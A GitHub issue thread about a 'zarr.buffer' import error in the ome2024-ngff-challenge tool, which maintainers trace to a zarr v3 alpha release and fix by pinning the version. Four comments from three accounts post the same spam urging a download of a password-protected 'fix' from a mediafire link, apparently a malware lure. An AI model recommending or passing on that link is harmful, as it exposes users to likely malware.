### ISSUE TITLE
ModuleNotFoundError: No module named 'zarr.buffer'

### ISSUE THREAD

**Issue by JThoennissen** [ome/ome2024-ngff-challenge#40]
Hey there 👋 

I just tried to use the ome2024-ngff-challenge tool but I encountered an issue. I ran the following:

```
python3.11 -m venv venv
source venv/bin/activate
pip install ome2024-ngff-challenge
ome2024-ngff-challenge --help
```

This gave me the following error:
```
File "/home/jthoennissen/venv/bin/ome2024-ngff-challenge", line 5, in <module>
    from ome2024_ngff_challenge import dispatch
  File "/home/jthoennissen/venv/lib/python3.11/site-packages/ome2024_ngff_challenge/__init__.py", line 12, in <module>
    from .lookup import cli as lookup_cli
  File "/home/jthoennissen/venv/lib/python3.11/site-packages/ome2024_ngff_challenge/lookup.py", line 8, in <module>
    from .utils import configure_logging
  File "/home/jthoennissen/venv/lib/python3.11/site-packages/ome2024_ngff_challenge/utils.py", line 17, in <module>
    from zarr.buffer import Buffer, BufferPrototype
ModuleNotFoundError: No module named 'zarr.buffer'
```

**OS**: Ubuntu 20.04.6 LTS 
**Python version**: Python 3.11.9

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by will-moore** [comment]
Can you check what version of zarr you have installed?

```
$ pip freeze | grep zarr
zarr==3.0.0a0
```
is what's expected based on https://github.com/ome/ome2024-ngff-challenge/blob/d25e1246b900b594c32c8214a0cb6390960fabbb/pyproject.toml#L36

**Comment by d-v-b** [comment]
it's possible that this arises because of the latest zarr-python v3 alpha release from a few days ago: https://github.com/zarr-developers/zarr-python/releases/tag/v3.0.0-alpha.1

I think this project should pin the zarr-python version exactly until the zarr-python API settles down

**Comment by JThoennissen** [comment]
Yep, I have 3.0.0a1

```
$ pip freeze | grep zarr
zarr==3.0.0a1
```

**Comment by will-moore** [comment]
Thanks @d-v-b - I'll do that now...
